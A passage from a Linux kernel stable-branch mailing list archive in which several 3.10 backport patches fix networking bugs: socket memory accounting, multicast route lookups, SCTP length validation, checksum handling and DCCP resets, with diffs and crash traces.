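#include <assert.h>

#define QUANTUM_SHIFT 12	/* assumed 4096-byte quantum */

/* Minimal stand-in for the accounting fields of a socket. */
struct sock_model {
	int       forward_alloc;	/* bytes reserved by this socket */
	long long allocated;		/* protocol-wide counter, in quanta */
};

static inline void reclaim(struct sock_model *sk, int amount)
{
	amount >>= QUANTUM_SHIFT;
	sk->allocated -= amount;
	sk->forward_alloc -= amount << QUANTUM_SHIFT;
}

/* Uncharge with the preemptive reclaim: at 2 MB, give 1 MB back. */
static inline void uncharge(struct sock_model *sk, int size)
{
	sk->forward_alloc += size;
	if (sk->forward_alloc >= 1 << 21)
		reclaim(sk, 1 << 20);
}

/* Hypothetical self-check: 40000 * 64 KB is about 2.6 GB in total. */
static inline void uncharge_self_check(void)
{
	struct sock_model sk = { 0, 1 << 20 };

	for (int i = 0; i < 40000; i++) {
		uncharge(&sk, 1 << 16);
		assert(sk.forward_alloc > 0);
		assert(sk.forward_alloc < 1 << 21);
	}
}
```

Note that the 2 MB bound in this model relies on each individual uncharge
being small compared to 1 MB, as is the case for skb-sized releases.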

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/sock.h | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/include/net/sock.h b/include/net/sock.h
index 6d2fbac..a46dd30 100644
--- a/include/net/sock.h
+++ b/include/net/sock.h
@@ -1422,6 +1422,16 @@ static inline void sk_mem_uncharge(struct sock *sk, int size)
 	if (!sk_has_account(sk))
 		return;
 	sk->sk_forward_alloc += size;
+
+	/* Avoid a possible overflow.
+	 * TCP send queues can make this happen, if sk_mem_reclaim()
+	 * is not called and more than 2 GBytes are released at once.
+	 *
+	 * If we reach 2 MBytes, reclaim 1 MBytes right now, there is
+	 * no need to hold that much forward allocation anyway.
+	 */
+	if (unlikely(sk->sk_forward_alloc >= 1 << 21))
+		__sk_mem_reclaim(sk, 1 << 20);
 }
 
 static inline void sk_wmem_free_skb(struct sock *sk, struct sk_buff *skb)
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (153 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev Willy Tarreau
                   ` (63 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Nikolay Aleksandrov, David S . Miller, Willy Tarreau

From: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>

commit 2cf750704bb6d7ed8c7d732e071dd1bc890ea5e8 upstream.

Since the commit below, the ipmr/ip6mr rtnl_unicast() code uses the portid
instead of the previous dst_pid, which was copied from in_skb's portid.
Since the skb is new, the portid is 0 at that point, so the packets are sent
to the kernel and we get scheduling while atomic or a deadlock (depending
on where it happens) by trying to acquire rtnl twice.
Also, since this is RTM_GETROUTE, it can be triggered by a normal user.

Here's the sleeping while atomic trace:
[ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
[ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
[ 7858.212881] 2 locks held by swapper/0/0:
[ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
[ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
[ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
[ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
[ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
[ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
[ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
[ 7858.215251] Call Trace:
[ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
[ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
[ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
[ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
[ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
[ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
[ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
[ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
[ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
[ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
[ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
[ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
[ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
[ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
[ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
[ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
[ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
[ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
[ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
[ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
[ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
[ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
[ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
[ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
[ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
[ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
[ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
[ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
[ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a

Fixes: 2942e9005056 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/mroute.h  | 2 +-
 include/linux/mroute6.h | 2 +-
 net/ipv4/ipmr.c         | 3 ++-
 net/ipv4/route.c        | 3 ++-
 net/ipv6/ip6mr.c        | 5 +++--
 net/ipv6/route.c        | 4 +++-
 6 files changed, 12 insertions(+), 7 deletions(-)

diff --git a/include/linux/mroute.h b/include/linux/mroute.h
index 79aaa9f..d5277fc 100644
--- a/include/linux/mroute.h
+++ b/include/linux/mroute.h
@@ -103,5 +103,5 @@ struct mfc_cache {
 struct rtmsg;
 extern int ipmr_get_route(struct net *net, struct sk_buff *skb,
 			  __be32 saddr, __be32 daddr,
-			  struct rtmsg *rtm, int nowait);
+			  struct rtmsg *rtm, int nowait, u32 portid);
 #endif
diff --git a/include/linux/mroute6.h b/include/linux/mroute6.h
index 66982e7..f831155 100644
--- a/include/linux/mroute6.h
+++ b/include/linux/mroute6.h
@@ -115,7 +115,7 @@ struct mfc6_cache {
 
 struct rtmsg;
 extern int ip6mr_get_route(struct net *net, struct sk_buff *skb,
-			   struct rtmsg *rtm, int nowait);
+			   struct rtmsg *rtm, int nowait, u32 portid);
 
 #ifdef CONFIG_IPV6_MROUTE
 extern struct sock *mroute6_socket(struct net *net, struct sk_buff *skb);
diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
index 89570f0..a429ac6 100644
--- a/net/ipv4/ipmr.c
+++ b/net/ipv4/ipmr.c
@@ -2190,7 +2190,7 @@ static int __ipmr_fill_mroute(struct mr_table *mrt, struct sk_buff *skb,
 
 int ipmr_get_route(struct net *net, struct sk_buff *skb,
 		   __be32 saddr, __be32 daddr,
-		   struct rtmsg *rtm, int nowait)
+		   struct rtmsg *rtm, int nowait, u32 portid)
 {
 	struct mfc_cache *cache;
 	struct mr_table *mrt;
@@ -2235,6 +2235,7 @@ int ipmr_get_route(struct net *net, struct sk_buff *skb,
 			return -ENOMEM;
 		}
 
+		NETLINK_CB(skb2).portid = portid;
 		skb_push(skb2, sizeof(struct iphdr));
 		skb_reset_network_header(skb2);
 		iph = ip_hdr(skb2);
diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index 624ca8e..93efb89 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -2325,7 +2325,8 @@ static int rt_fill_info(struct net *net,  __be32 dst, __be32 src,
 		    IPV4_DEVCONF_ALL(net, MC_FORWARDING)) {
 			int err = ipmr_get_route(net, skb,
 						 fl4->saddr, fl4->daddr,
-						 r, nowait);
+						 r, nowait, portid);
+
 			if (err <= 0) {
 				if (!nowait) {
 					if (err == 0)
diff --git a/net/ipv6/ip6mr.c b/net/ipv6/ip6mr.c
index 107f7528..8344f68 100644
--- a/net/ipv6/ip6mr.c
+++ b/net/ipv6/ip6mr.c
@@ -2275,8 +2275,8 @@ static int __ip6mr_fill_mroute(struct mr6_table *mrt, struct sk_buff *skb,
 	return 1;
 }
 
-int ip6mr_get_route(struct net *net,
-		    struct sk_buff *skb, struct rtmsg *rtm, int nowait)
+int ip6mr_get_route(struct net *net, struct sk_buff *skb, struct rtmsg *rtm,
+		    int nowait, u32 portid)
 {
 	int err;
 	struct mr6_table *mrt;
@@ -2321,6 +2321,7 @@ int ip6mr_get_route(struct net *net,
 			return -ENOMEM;
 		}
 
+		NETLINK_CB(skb2).portid = portid;
 		skb_reset_transport_header(skb2);
 
 		skb_put(skb2, sizeof(struct ipv6hdr));
diff --git a/net/ipv6/route.c b/net/ipv6/route.c
index 6ebefd4..fb5010c 100644
--- a/net/ipv6/route.c
+++ b/net/ipv6/route.c
@@ -2536,7 +2536,9 @@ static int rt6_fill_node(struct net *net,
 	if (iif) {
 #ifdef CONFIG_IPV6_MROUTE
 		if (ipv6_addr_is_multicast(&rt->rt6i_dst.addr)) {
-			int err = ip6mr_get_route(net, skb, rtm, nowait);
+			int err = ip6mr_get_route(net, skb, rtm, nowait,
+						  portid);
+
 			if (err <= 0) {
 				if (!nowait) {
 					if (err == 0)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (154 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 257/319] net: sctp, forbid negative length Willy Tarreau
                   ` (62 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Anoob Soman, David S . Miller, Willy Tarreau

From: Anoob Soman <anoob.soman@citrix.com>

commit 6664498280cf17a59c3e7cf1a931444c02633ed1 upstream.

If a socket has the FANOUT sockopt set, a new prot_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink() is called for all sockets, but the
prot_hook that was registered as part of fanout_add() is not removed.
Call fanout_release() on NETDEV_UNREGISTER, which removes the prot_hook
and removes the fanout from the fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo().

Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/packet/af_packet.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
index 2d454a2..24f0066 100644
--- a/net/packet/af_packet.c
+++ b/net/packet/af_packet.c
@@ -3384,6 +3384,7 @@ static int packet_notifier(struct notifier_block *this, unsigned long msg, void
 				}
 				if (msg == NETDEV_UNREGISTER) {
 					packet_cached_dev_reset(po);
+					fanout_release(sk);
 					po->ifindex = -1;
 					if (po->prot_hook.dev)
 						dev_put(po->prot_hook.dev);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 257/319] net: sctp, forbid negative length
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (155 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 258/319] sctp: validate chunk len before actually using it Willy Tarreau
                   ` (61 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jiri Slaby, Vlad Yasevich, Neil Horman, David S. Miller,
	linux-sctp, netdev, Willy Tarreau

From: Jiri Slaby <jslaby@suse.cz>

commit a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf upstream.

Most of the getsockopt handlers in net/sctp/socket.c check len against
the sizeof some structure, like:
        if (len < sizeof(int))
                return -EINVAL;

At first glance, the check seems to be correct. But since len is an int
and sizeof yields a size_t, the int is converted to the unsigned size_t
for the comparison. So the test evaluates to false for negative lengths.
Yes, (-1 < sizeof(long)) is false.
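
The conversion described above can be reproduced outside the kernel. The
following is a minimal userspace sketch, not code from this patch; the
helper names len_too_short_buggy() and len_too_short_fixed() are
hypothetical and exist only for illustration.

```c
#include <stddef.h>

/* Buggy form: len is implicitly converted to size_t before the
 * comparison, so a negative len becomes a huge unsigned value and the
 * "too short" test does not fire. */
static int len_too_short_buggy(int len)
{
	return len < sizeof(int);
}

/* Fixed form: reject negative values first, then compare as unsigned. */
static int len_too_short_fixed(int len)
{
	return len < 0 || (size_t)len < sizeof(int);
}
```

With len == -1 the buggy helper reports that the length is fine, while
the fixed helper rejects it. The patch gets the same effect by checking
len < 0 once in sctp_getsockopt(), before any handler runs.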

Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.

Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.

If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
 0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
 ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
 0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
 [<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
 [<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
 [<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
 [<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
 [<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
 [<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
 [<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
 [<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sctp/socket.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/net/sctp/socket.c b/net/sctp/socket.c
index bdc3fb6..86e7352 100644
--- a/net/sctp/socket.c
+++ b/net/sctp/socket.c
@@ -4259,7 +4259,7 @@ static int sctp_getsockopt_disable_fragments(struct sock *sk, int len,
 static int sctp_getsockopt_events(struct sock *sk, int len, char __user *optval,
 				  int __user *optlen)
 {
-	if (len <= 0)
+	if (len == 0)
 		return -EINVAL;
 	if (len > sizeof(struct sctp_event_subscribe))
 		len = sizeof(struct sctp_event_subscribe);
@@ -5770,6 +5770,9 @@ SCTP_STATIC int sctp_getsockopt(struct sock *sk, int level, int optname,
 	if (get_user(len, optlen))
 		return -EFAULT;
 
+	if (len < 0)
+		return -EINVAL;
+
 	sctp_lock_sock(sk);
 
 	switch (optname) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 258/319] sctp: validate chunk len before actually using it
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (156 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 257/319] net: sctp, forbid negative length Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock() Willy Tarreau
                   ` (60 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Marcelo Ricardo Leitner, David S . Miller, Willy Tarreau

From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>

commit bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream.

Andrey Konovalov reported that KASAN detected SCTP accessing a slab
object beyond its boundaries. The cause is that, when handling
out-of-the-blue packets, sctp_sf_ootb() checked the chunk len only
after it had already processed the first chunk, so the check only
validated the 2nd and subsequent chunks.

The fix is to just move the check upwards so it's also validated for the
1st chunk.
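
The ordering issue can be illustrated with a small userspace walker over
a buffer of length-prefixed chunks. This is a sketch under assumptions,
not the kernel code: the 4-byte header layout, HDR_LEN, round4() and
count_chunks() are hypothetical stand-ins for sctp_chunkhdr_t,
WORD_ROUND() and the loop in sctp_sf_ootb().

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 4-byte chunk header: type, flags, 16-bit big-endian length. */
#define HDR_LEN 4u

/* Round a length up to a multiple of 4, in the spirit of WORD_ROUND(). */
static size_t round4(size_t n)
{
	return (n + 3u) & ~(size_t)3u;
}

/* Returns the number of well-formed chunks, or -1 on a length violation. */
static int count_chunks(const uint8_t *buf, size_t size)
{
	size_t off = 0;
	int n = 0;

	while (off < size) {
		size_t len;

		if (size - off < HDR_LEN)
			return -1;	/* not even a full header left */
		len = ((size_t)buf[off + 2] << 8) | buf[off + 3];
		if (len < HDR_LEN)
			return -1;	/* length smaller than the header */
		/* Validate the chunk end BEFORE any type-specific use of
		 * the chunk, so that the first chunk is covered too. */
		if (round4(len) > size - off)
			return -1;
		/* type-specific processing of the chunk would go here */
		off += round4(len);
		n++;
	}
	return n;
}
```

A single chunk that claims 64 bytes inside a 4-byte buffer is rejected
on the first iteration, which is the case the original ordering missed.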

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sctp/sm_statefuns.c | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
index d9cbecb..df938b2 100644
--- a/net/sctp/sm_statefuns.c
+++ b/net/sctp/sm_statefuns.c
@@ -3428,6 +3428,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
 			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
 						  commands);
 
+		/* Report violation if chunk len overflows */
+		ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
+		if (ch_end > skb_tail_pointer(skb))
+			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
+						  commands);
+
 		/* Now that we know we at least have a chunk header,
 		 * do things that are type appropriate.
 		 */
@@ -3459,12 +3465,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
 			}
 		}
 
-		/* Report violation if chunk len overflows */
-		ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
-		if (ch_end > skb_tail_pointer(skb))
-			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
-						  commands);
-
 		ch = (sctp_chunkhdr_t *) ch_end;
 	} while (ch_end < skb_tail_pointer(skb));
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (157 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 258/319] sctp: validate chunk len before actually using it Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help() Willy Tarreau
                   ` (59 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit e551c32d57c88923f99f8f010e89ca7ed0735e83 upstream.

At accept() time, it is possible the parent has a non-zero
sk_err_soft, left over from a prior error.

Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/core/sock.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/core/sock.c b/net/core/sock.c
index 6473fef..e3cb454 100644
--- a/net/core/sock.c
+++ b/net/core/sock.c
@@ -1515,6 +1515,7 @@ struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority)
 		}
 
 		newsk->sk_err	   = 0;
+		newsk->sk_err_soft = 0;
 		newsk->sk_priority = 0;
 		/*
 		 * Before updating sk_refcnt, we must commit prior changes to memory
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (158 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets Willy Tarreau
                   ` (58 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Maciej Żenczykowski, Willem de Bruijn,
	David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 upstream.

Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.
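
As an illustration of the substitution, here is a minimal userspace
sketch. It is not the kernel implementation: csum_fold32(),
csum_for_wire() and MANGLED_ZERO are hypothetical names standing in for
csum_fold() and CSUM_MANGLED_0, and the plain ternary replaces the GNU
"?:" shorthand used in the patch.

```c
#include <stdint.h>

/* Value sent instead of an all-zero checksum (0xffff is the other
 * one's-complement representation of zero). */
#define MANGLED_ZERO 0xffffu

/* Fold a 32-bit one's-complement accumulator into 16 bits and invert it. */
static uint16_t csum_fold32(uint32_t sum)
{
	sum = (sum & 0xffffu) + (sum >> 16);
	sum = (sum & 0xffffu) + (sum >> 16);
	return (uint16_t)~sum;
}

/* Checksum as it would be written into the packet: never zero. */
static uint16_t csum_for_wire(uint32_t sum)
{
	uint16_t folded = csum_fold32(sum);

	return folded ? folded : MANGLED_ZERO;
}
```

An accumulator of 0xffff folds to 0 and is therefore emitted as 0xffff,
while any non-zero folded value passes through unchanged.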

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/core/dev.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/core/dev.c b/net/core/dev.c
index 408f6ee..6494918 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -2234,7 +2234,7 @@ int skb_checksum_help(struct sk_buff *skb)
 			goto out;
 	}
 
-	*(__sum16 *)(skb->data + offset) = csum_fold(csum);
+	*(__sum16 *)(skb->data + offset) = csum_fold(csum) ?: CSUM_MANGLED_0;
 out_set_summed:
 	skb->ip_summed = CHECKSUM_NONE;
 out:
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (159 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err() Willy Tarreau
                   ` (57 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 346da62cc186c4b4b1ac59f87f4482b47a047388 upstream.

Andrey reported the following warning while fuzzing with syzkaller:

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
 [<     inline     >] __dump_stack lib/dump_stack.c:15
 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
